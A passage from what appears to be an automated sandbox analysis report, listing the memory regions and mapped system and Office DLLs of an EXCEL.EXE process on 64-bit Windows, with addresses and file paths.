region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 314 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x77a50000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 315 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 316 start_va = 0x77d20000 end_va = 0x77d26fff entry_point = 0x77d20000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 317 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 318 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 319 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 320 start_va = 0x13f520000 end_va = 0x14149afff entry_point = 0x13f520000 region_type = mapped_file name = "excel.exe" filename = "\\PROGRA~1\\MICROS~1\\Office15\\EXCEL.EXE" (normalized: "c:\\progra~1\\micros~1\\office15\\excel.exe") Region: id = 321 start_va = 0x7feea140000 end_va = 0x7feea1bafff entry_point = 0x7feea140000 region_type = mapped_file name = "structuredquery.dll" filename = "\\Windows\\System32\\StructuredQuery.dll" (normalized: "c:\\windows\\system32\\structuredquery.dll") Region: id = 322 start_va = 0x7feea1c0000 end_va = 0x7feea290fff entry_point = 0x7feea1c0000 region_type = mapped_file name = "wxpnse.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\WXPNSE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\wxpnse.dll") Region: id = 323 start_va = 0x7feea820000 end_va = 0x7feea83bfff entry_point = 0x7feea820000 region_type = mapped_file name = "msohev.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\MSOHEV.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\msohev.dll") Region: id = 324 start_va = 0x7feea840000 end_va = 0x7feea9bdfff entry_point = 0x7feea840000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 325 start_va = 0x7feea9c0000 end_va = 0x7feeaa58fff entry_point = 0x7feea9c0000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 326 start_va = 0x7feeaa60000 end_va = 0x7feeab25fff entry_point = 0x7feeaa60000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 327 start_va = 0x7feeab30000 end_va = 0x7feeacfffff entry_point = 0x7feeab30000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 328 start_va = 0x7feead00000 end_va = 0x7feec113fff entry_point = 0x7feead00000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\oart.dll") Region: id = 329 start_va = 0x7feecd60000 end_va = 0x7fef1a4afff entry_point = 0x7feecd60000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\msores.dll") Region: id = 330 start_va = 0x7fef1b30000 end_va = 0x7fef1c06fff entry_point = 0x7fef1b30000 region_type = mapped_file name = "searchfolder.dll" filename = "\\Windows\\System32\\SearchFolder.dll" (normalized: "c:\\windows\\system32\\searchfolder.dll") Region: id = 331 start_va = 0x7fef1d00000 end_va = 0x7fef1d6efff entry_point = 0x7fef1d00000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 332 start_va = 0x7fef2000000 end_va = 0x7fef2222fff entry_point = 0x7fef2000000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\riched20.dll") Region: id = 333 start_va = 0x7fef2230000 end_va = 0x7fef224bfff entry_point = 0x7fef2230000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 334 start_va = 0x7fef2370000 end_va = 0x7fef240ffff entry_point = 0x7fef2370000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 335 start_va = 0x7fef2880000 end_va = 0x7fef2bf6fff entry_point = 0x7fef2880000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\1033\\msointl.dll") Region: id = 336 start_va = 0x7fef2c00000 end_va = 0x7fef4eb0fff entry_point = 0x7fef2c00000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\mso.dll") Region: id = 337 start_va = 0x7fef6c50000 end_va = 0x7fef6e41fff entry_point = 0x7fef6c50000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 338 start_va = 0x7fef6ee0000 end_va = 0x7fef6f50fff entry_point = 0x7fef6ee0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 339 start_va = 0x7fef7660000 end_va = 0x7fef76defff entry_point = 0x7fef7660000 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 340 start_va = 0x7fef76e0000 end_va = 0x7fef771afff entry_point = 0x7fef76e0000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 341 start_va = 0x7fef7720000 end_va = 0x7fef77e5fff entry_point = 0x7fef7720000 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 342 start_va = 0x7fef7ab0000 end_va = 0x7fef7abbfff entry_point = 0x7fef7ab0000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 343 start_va = 0x7fef7c80000 end_va = 0x7fef7c89fff entry_point = 0x7fef7c80000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 344 start_va = 0x7fef7d80000 end_va = 0x7fef7e58fff entry_point = 0x7fef7d80000 region_type = mapped_file name = "adal.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\ADAL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\adal.dll") Region: id = 345 start_va = 0x7fef7e60000 end_va = 0x7fef7f41fff entry_point = 0x7fef7e60000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 346 start_va = 0x7fef7f50000 end_va = 0x7fef7f56fff entry_point = 0x7fef7f50000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 347 start_va = 0x7fef89a0000 end_va = 0x7fef8e9ffff entry_point = 0x7fef89a0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\cultures\\office.odf") Region: id = 348 start_va = 0x7fef8ea0000 end_va = 0x7fef91b5fff entry_point = 0x7fef8ea0000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 349 start_va = 0x7fef9470000 end_va = 0x7fef9639fff entry_point = 0x7fef9470000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 350 start_va = 0x7fef9640000 end_va = 0x7fef96e6fff entry_point = 0x7fef9640000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 351 start_va = 0x7fef96f0000 end_va = 0x7fef9744fff entry_point = 0x7fef96f0000 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 352 start_va = 0x7fef9750000 end_va = 0x7fef9783fff entry_point = 0x7fef9750000 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 353 start_va = 0x7fef9dd0000 end_va = 0x7fef9dddfff entry_point = 0x7fef9dd0000 region_type = mapped_file name = "msimtf.dll" filename = "\\Windows\\System32\\msimtf.dll" (normalized: "c:\\windows\\system32\\msimtf.dll") Region: id = 354 start_va = 0x7fefaad0000 end_va = 0x7fefab26fff entry_point = 0x7fefaad0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 355 start_va = 0x7fefaba0000 end_va = 0x7fefac03fff entry_point = 0x7fefaba0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 356 start_va = 0x7fefac10000 end_va = 0x7fefac80fff entry_point = 0x7fefac10000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 357 start_va = 0x7fefb710000 end_va = 0x7fefb724fff entry_point = 0x7fefb710000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 358 start_va = 0x7fefb730000 end_va = 0x7fefb73bfff entry_point = 0x7fefb730000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 359 start_va = 0x7fefb740000 end_va = 0x7fefb755fff entry_point = 0x7fefb740000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 360 start_va = 0x7fefbd50000 end_va = 0x7fefbd7cfff entry_point = 0x7fefbd50000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 361 start_va = 0x7fefbdc0000 end_va = 0x7fefbdd0fff entry_point = 0x7fefbdc0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 362 start_va = 0x7fefbe50000 end_va = 0x7fefbf79fff entry_point = 0x7fefbe50000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 363 start_va = 0x7fefbf80000 end_va = 0x7fefbfb4fff entry_point = 0x7fefbf80000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 364 start_va = 0x7fefbfc0000 end_va = 0x7fefbfd7fff entry_point = 0x7fefbfc0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 365 start_va = 0x7fefc080000 end_va = 0x7fefc0c2fff entry_point = 0x7fefc080000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 366 start_va = 0x7fefc0d0000 end_va = 0x7fefc1c1fff entry_point = 0x7fefc0d0000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 367 start_va = 0x7fefc1d0000 end_va = 0x7fefc3e4fff entry_point = 0x7fefc1d0000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 368 start_va = 0x7fefc3f0000 end_va = 0x7fefc445fff entry_point = 0x7fefc3f0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 369 start_va = 0x7fefc450000 end_va = 0x7fefc57bfff entry_point = 0x7fefc450000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 370 start_va = 0x7fefc5d0000 end_va = 0x7fefc7c3fff entry_point = 0x7fefc5d0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 371 start_va = 0x7fefcc60000 end_va = 0x7fefcc6bfff entry_point = 0x7fefcc60000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 372 start_va = 0x7fefd090000 end_va = 0x7fefd0d6fff entry_point = 0x7fefd090000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 373 start_va = 0x7fefd390000 end_va = 0x7fefd3a6fff entry_point = 0x7fefd390000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 374 start_va = 0x7fefd890000 end_va = 0x7fefd8b2fff entry_point = 0x7fefd890000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 375 start_va = 0x7fefd930000 end_va = 0x7fefd93afff entry_point = 0x7fefd930000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 376 start_va = 0x7fefd960000 end_va = 0x7fefd984fff entry_point = 0x7fefd960000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 377 start_va = 0x7fefd990000 end_va = 0x7fefd99efff entry_point = 0x7fefd990000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 378 start_va = 0x7fefda40000 end_va = 0x7fefda7cfff entry_point = 0x7fefda40000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 379 start_va = 0x7fefda80000 end_va = 0x7fefda93fff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 380 start_va = 0x7fefdaa0000 end_va = 0x7fefdaaefff entry_point = 0x7fefdaa0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 381 start_va = 0x7fefdb40000 end_va = 0x7fefdb4efff entry_point = 0x7fefdb40000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 382 start_va = 0x7fefdb50000 end_va = 0x7fefdb69fff entry_point = 0x7fefdb50000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 383 start_va = 0x7fefdb70000 end_va = 0x7fefdcd6fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 384 start_va = 0x7fefdce0000 end_va = 0x7fefdd19fff entry_point = 0x7fefdce0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 385 start_va = 0x7fefdd20000 end_va = 0x7fefdd8afff entry_point = 0x7fefdd20000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 386 start_va = 0x7fefde30000 end_va = 0x7fefde65fff entry_point = 0x7fefde30000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 387 start_va = 0x7fefde70000 end_va = 0x7fefde7dfff entry_point = 0x7fefde70000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 388 start_va = 0x7fefde80000 end_va = 0x7fefdf1efff entry_point = 0x7fefde80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 389 start_va = 0x7fefdf20000 end_va = 0x7fefdfb6fff entry_point = 0x7fefdf20000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 390 start_va = 0x7fefdfc0000 end_va = 0x7fefe096fff entry_point = 0x7fefdfc0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 391 start_va = 0x7fefe0b0000 end_va = 0x7fefe1d9fff entry_point = 0x7fefe0b0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 392 start_va = 0x7fefe1e0000 end_va = 0x7fefe20dfff entry_point = 0x7fefe1e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 393 start_va = 0x7fefe210000 end_va = 0x7fefe276fff entry_point = 0x7fefe210000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 394 start_va = 0x7fefe280000 end_va = 0x7fefe2f0fff entry_point = 0x7fefe280000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 395 start_va = 0x7fefe300000 end_va = 0x7fefe408fff entry_point = 0x7fefe300000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 396 start_va = 0x7fefe410000 end_va = 0x7fefe4eafff entry_point = 0x7fefe410000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 397 start_va = 0x7fefe4f0000 end_va = 0x7fefe6f2fff entry_point = 0x7fefe4f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 398 start_va = 0x7fefe700000 end_va = 0x7feff487fff entry_point = 0x7fefe700000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 399 start_va = 0x7feff490000 end_va = 0x7feff6e8fff entry_point = 0x7feff490000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 400 start_va = 0x7feff770000 end_va = 0x7feff8e7fff entry_point = 0x7feff770000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 401 start_va = 0x7feff8f0000 end_va = 0x7feff941fff entry_point = 0x7feff8f0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 402 start_va = 0x7feff9a0000 end_va = 0x7feffaccfff entry_point = 0x7feff9a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 403 start_va = 0x7feffaf0000 end_va = 0x7feffcc6fff entry_point = 0x7feffaf0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 404 start_va = 0x7feffcd0000 end_va = 0x7feffd68fff entry_point = 0x7feffcd0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 405 start_va = 0x7feffd70000 end_va = 0x7feffe38fff entry_point = 0x7feffd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 406 start_va = 0x7feffe40000 end_va = 0x7feffe5efff entry_point = 0x7feffe40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 407 start_va = 0x7feffe70000 end_va = 0x7feffe70fff entry_point = 0x7feffe70000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 408 start_va = 0x7ff6b220000 end_va = 0x7ff6b229fff entry_point = 0x0 region_type = private name = "private_0x000007ff6b220000" filename = "" Region: id = 409 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 410 start_va = 0x7fffff70000 end_va = 0x7fffff71fff entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 411 start_va = 0x7fffff72000 end_va = 0x7fffff73fff entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 412 start_va = 0x7fffff74000 end_va = 0x7fffff75fff entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 413 start_va = 0x7fffff76000 end_va = 0x7fffff77fff entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 414 start_va = 0x7fffff78000 end_va = 0x7fffff79fff entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 415 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 416 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 417 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 418 start_va = 0x7fffff80000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 419 start_va = 0x7fffff90000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 420 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 421 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 422 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 423 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 424 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 425 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 426 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 427 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 428 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 429 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 430 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 431 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 432 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 433 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 434 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 435 start_va = 0x7fee9fe0000 end_va = 0x7feea0a1fff entry_point = 0x7fee9fe0000 region_type = mapped_file name = "mssvp.dll" filename = "\\Windows\\System32\\mssvp.dll" (normalized: "c:\\windows\\system32\\mssvp.dll") Region: id = 436 start_va = 0x7feea740000 end_va = 0x7feea75afff entry_point = 0x7feea740000 region_type = mapped_file name = "mapi32.dll" filename = "\\Windows\\System32\\mapi32.dll" (normalized: "c:\\windows\\system32\\mapi32.dll") Region: id = 437 start_va = 0xa6c0000 end_va = 0xa7bffff entry_point = 0x0 region_type = private name = "private_0x000000000a6c0000" filename = "" Region: id = 438 start_va = 0x7fef7d30000 end_va = 0x7fef7d4efff entry_point = 0x7fef7d30000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 439 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 440 start_va = 0x7fef7ac0000 end_va = 0x7fef7af3fff entry_point = 0x7fef7ac0000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 441 start_va = 0x8800000 end_va = 0x8801fff entry_point = 0x8800000 region_type = mapped_file name = "mssvp.dll.mui" filename = "\\Windows\\System32\\en-US\\mssvp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mssvp.dll.mui") Region: id = 442 start_va = 0x7fef5230000 end_va = 0x7fef5283fff entry_point = 0x7fef5230000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 443 start_va = 0x7fef5290000 end_va = 0x7fef5e46fff entry_point = 